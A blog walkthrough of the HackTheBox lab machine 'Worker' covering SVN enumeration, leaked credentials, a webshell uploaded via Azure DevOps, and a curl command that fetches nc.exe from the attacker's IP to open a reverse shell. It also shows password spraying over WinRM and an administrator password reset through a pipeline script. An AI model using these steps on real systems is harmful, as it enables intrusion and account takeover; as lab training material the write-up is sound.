Posts HackTheBox - Worker
Post
Cancel

HackTheBox - Worker

Worker was an interesting 30 point box created by ekenas that introduces some cool technologies such as SVN and Azure Devops.

User.txt

Nmap


A quick nmap scan reveals the following ports and services:

1
2
3
4
5
6
# nmap -sT --min-rate 3000 -p- 10.10.10.203

PORT     STATE SERVICE
80/tcp   open  http
3690/tcp open  svn
5985/tcp open  wsman
1
2
3
4
5
6
7
8
9
10
11
12
13
# nmap -sV -sC -p 80,3690,5985 10.10.10.203                      

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


HTTP


Checking out http://10.10.10.203/ we’re presented with the standard default IIS web page:


SVN


Apache Subversion is a software versioning and revision control system distributed as open source under the Apache License. Software developers use Subversion to maintain current and historical versions of files such as source code, web pages, and documentation.

We can query the SVN service running on the server using the svn command:

1
2
3
4
5
6
7
8
9
10
11
# svn info svn://10.10.10.203:3690
Path: .
URL: svn://10.10.10.203
Relative URL: ^/
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)

Common commands such as cat and ls are also supported:

1
2
3
# svn ls svn://10.10.10.203:3690
dimension.worker.htb/
moved.txt
1
2
3
4
5
# svn cat svn://10.10.10.203:3690/moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

Checking out http://devops.worker.htb we’re prompted to login:


We obviously need credentials, let’s continue enumerating the SVN server:

1
2
3
4
5
6
# svn ls svn://10.10.10.203:3690/dimension.worker.htb/ 
LICENSE.txt
README.txt
assets/
images/
index.html

There appears to be a site running at dimension.worker.htb, I decided to see if there was anything interesing there. Clicking on the work tab presents you with the following page:


Each link will attempt to send you to a different subdomain, I downloaded the page with wget and grepped out the linked subdomains:

1
2
3
4
5
6
7
# cat index.html | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | sort -u
http://alpha.worker.htb/
http://cartoon.worker.htb/
http://lens.worker.htb/
http://solid-state.worker.htb/
http://spectral.worker.htb/
http://story.worker.htb/

There’s not much to see on any of them, I did make note of them though as they may come in handy later on.


SVN Log


The svn log command shows log messages from the repository:

1
2
3
4
5
6
7
8
9
10
11
# svn log svn://10.10.10.203:3690/ -v                                         
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Changed paths:                                               
   A /moved.txt                                                        
                                                                
Added note that repo has been migrated                                      
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Changed paths:                                         
   D /deploy.ps1

deploy.ps1 stands out immediately, developers tend to make the mistake of hardcoding credentials in deployment scripts. We can view the changes made using the following command:

1
2
3
4
5
6
7
8
9
10
11
12
# svn diff svn://10.10.10.203:3690/ -c 2
Index: deploy.ps1
===================================================================
--- deploy.ps1  (nonexistent)
+++ deploy.ps1  (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen" 
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

We can see that credentials were added in order to run the Copy-Site.ps1 script.


Devops


With valid credentials we can now login to the devops.worker.htb portal:


Clicking on the SmartHotel360 project leads as to the overview page:


Checking out the Repos tab you can see all the repositories available to us within the portal, which appear to be for the subdomains we discovered earlier on the dimension.worker.htb subdomain:


However, if you attempt to upload a webshell to one you’ll be greeted with the following error message:



Webshell Upload


As we can’t just drop a webshell into a repo and access it on the site, the following steps are required:

1. Create new work item


Test Case will do fine, be sure to give it a name and then click Save & Close:


2. Create a new branch

Give it a name and select the work item you created in the last step from the Work items to link dropdown:


3. Upload webshell to new branch

I used the aspx webshell located at /usr/share/webshells/aspx/cmdasp.aspx on Kali and uploaded it to the repo:


4. Create a new pull request

Select the following link after uploading the webshell:


Leave the following as is and click Create:


5. Approve and Complete the pull request

Click the Approve button in the top right corner:


Once that’s done, click Complete and then Complete merge:



Webshell to Netcat


After finishing the previous steps the webshell will be available at your target subdomain, in this instance http://spectral.worker.htb/cmdasp.aspx:


Upgrading the webshell to a netcat reverse shell is trivial, serve the nc.exe binary:

1
# python3 -m http.server 80

Then use curl from the webshell to download and execute nc.exe:

1
curl http://10.10.14.122/nc.exe -o C:\programdata\nc.exe && C:\programdata\nc.exe 10.10.14.122 443 -e cmd.exe

And listen for the incoming connection:

1
2
3
4
5
6
7
8
9
# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.122] from (UNKNOWN) [10.10.10.203] 50976
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool


svnrepos


Enumerating the file system and the availabe drives, you’ll come across a svnrepos directory:

1
2
3
4
c:\>fsutil fsinfo drives
fsutil fsinfo drives

Drives: C:\ W:\ 
1
2
3
4
5
6
7
8
9
10
11
12
13
W:\>dir
dir
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\

2020-06-16  17:59    <DIR>          agents
2020-03-28  14:57    <DIR>          AzureDevOpsData
2020-04-03  10:31    <DIR>          sites
2020-06-20  15:04    <DIR>          svnrepos
               0 File(s)              0 bytes
               4 Dir(s)  18766782464 bytes free

The conf directory contained an interesting passwd file which contained numerous username and password combinations:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
W:\svnrepos\www\conf>dir
dir
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\svnrepos\www\conf

2020-06-20  14:30    <DIR>          .
2020-06-20  14:30    <DIR>          ..
2020-06-20  10:29             1112 authz
2020-06-20  10:29               904 hooks-env.tmpl
2020-06-20  14:27             1031 passwd
2020-04-04  19:51             4454 svnserve.conf
               4 File(s)          7501 bytes
               2 Dir(s)  18766782464 bytes free
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
W:\svnrepos\www\conf>type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday


Password spraying


As crackmapexec wasn’t working (shock) I used the winrm_login metasploit module to see if any of the credential combinations succeed at logging into the winrm service on the host.

First I copied the username/password combinations into a creds file in vim, then removed the = on each line:

1
:%s/=//g

Running the module with the user/pass file option, we get a positive hit for robisl / wolves11:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nathen:wendel98 (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nichin:fqerfqerf (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nichin:asifhiefh (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\noahip:player (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\nuahip:wkjdnw (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\oakhol:bxwdjhcue (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\owehol:supersecret (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\paihol:painfulcode (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\parhol:gitcommit (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\pathop:iliketomoveit (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\pauhor:nowayjose (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\payhos:icanjive (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\perhou:elvisisalive (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\peyhou:ineedvacation (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\phihou:pokemon (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\quehub:pickme (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\quihud:kindasecure (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rachul:guesswho (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\raehun:idontknow (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ramhun:thisis (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ranhut:getting (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rebhyd:rediculous (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reeinc:iagree (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reeing:tosomepoint (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\reiing:isthisenough (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\renipr:dummy (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rhiire:users (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\riairv:canyou (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ricisa:seewhich (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\robish:onesare (Incorrect: )
[+] 10.10.10.203:5985 - Login Successful: WORKSTATION\robisl:wolves11
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\robive:andwhich (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ronkay:onesare (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rubkei:the (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\rupkel:sheeps (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\ryakel:imtired (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sabken:drjones (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\samken:aqua (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sapket:hamburger (Incorrect: )
[-] 10.10.10.203:5985 - LOGIN FAILED: WORKSTATION\sarkil:friday (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Flag


Logging in via winrm we get the user flag:

1
2
3
4
5
6
7
# evil-winrm -i 10.10.10.203 -u robisl -p wolves11

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl

*Evil-WinRM* PS C:\Users\robisl\desktop> type user.txt
ef2ddf...



Root.txt

Devops PowerShell


Logging into the devops.worker.htb site as robisl you’ll be presented with the following page:


We can get code execution by creating a new Azure Pipeline and utilising a CmdLine task, using a YAML file to execute a system command of our choosing.


1. Create new Pipeline

In the left tab click on Pipeline then create a new Pipeline and select Azure Repos Git:


Then click the PartsUnlimited repo.

2. Starter Pipeline

At the next page scroll down and select Starter pipeline:


3. Review pipeline YAML

Add the following code into the YAML file:

1
2
3
steps:
- script: net user administrator P@ssword1!
  displayname: 'run a one line script'


Then click Save and run in the top right corner, then add new branch name and click Save and run again in the new window that pops up:


Admin


Once you’ve completed the previous steps you’ll be presented with the following window that confirms all tasks executed successfully:


Flag


We can simply login as administrator with the new password and get the root flag:

1
2
3
4
5
6
7
# evil-winrm -i 10.10.10.203 -u administrator -p P@ssword1!

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
worker\administrator

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
262a80...
This post is licensed under CC BY 4.0 by the author.